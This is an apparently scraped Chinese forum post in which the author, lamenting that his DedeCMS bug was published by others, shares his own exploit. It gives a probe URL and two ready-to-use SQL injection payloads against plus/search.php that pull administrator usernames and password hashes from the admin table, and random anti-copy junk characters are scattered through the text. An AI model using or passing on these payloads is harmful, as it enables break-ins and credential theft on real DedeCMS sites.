转载不加作者名的没JJ
) P+ B0 V! p4 t' ]5 k2 r# z6 c
, P+ \. q3 G4 Q, n2 W3 \哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。: t" H8 K; @, i( D i7 L
# r, [+ Q/ i, P' r
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。/ E$ c$ E% N. B
% ^) C* s9 q1 {' |' k' l我一般是这样测试的:6 `5 l5 E6 S+ `, ]
3 v3 y$ T+ L4 Q8 k
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
7 c- D, }2 ?2 W7 C0 n5 v1 [+ G$ U
( r4 D' \: L* h: H7 ^ U. t- b6 i转载不加作者名的没JJ
7 O! Z9 U4 t8 I1 v+ X
5 R, v4 j$ I s5 w作者:鬼哥
3 }" @7 }. Q j- c
4 _. y# u# _( d1 ]) R
% O( V! \# F6 a: v2 l' @# p |; R: \
看结果如果提示
( d# y" G7 P% y4 l) I
- R% S7 u; M ]$ |! USafe Alert: Request Error step 2 !
$ }9 I2 S# q4 u) n' K
/ Z% g/ b/ ~( ?: C& R那么直接用下面的exp$ l K6 _# I8 v& ` s* F" ^+ ^# d
. r. K9 _3 n lxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a/ t. ?* S1 e. Z9 Q$ a
7 W- U/ A1 F. S8 _* H% F) [# ~7 `3 \+ v g+ C8 N/ c( z
看结果如果提示
+ J5 E- D. e' W/ K4 `/ B/ [0 k, U6 X3 j% o
Safe Alert: Request Error step 1 !0 K( _* g" l; z) Q
# K$ G' Q# R q- B; n. L* ]
那么直接用下面的exp( D5 Y$ b5 ~* ]9 \' W, |% P
7 e! C0 Y: Q- _2 Q! b3 e+ ^5 dxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
% j' x) i1 ^9 T/ f3 u: M- c/ x8 O" I: g
" r6 Y+ }: F. v* A* ?3 |, ~
如果正常显示证明漏洞不存在了。2 ~+ `6 v2 H7 d) m- a% r/ D
" W/ e/ Y' }0 t# `0 v
转载不加作者名的没JJ |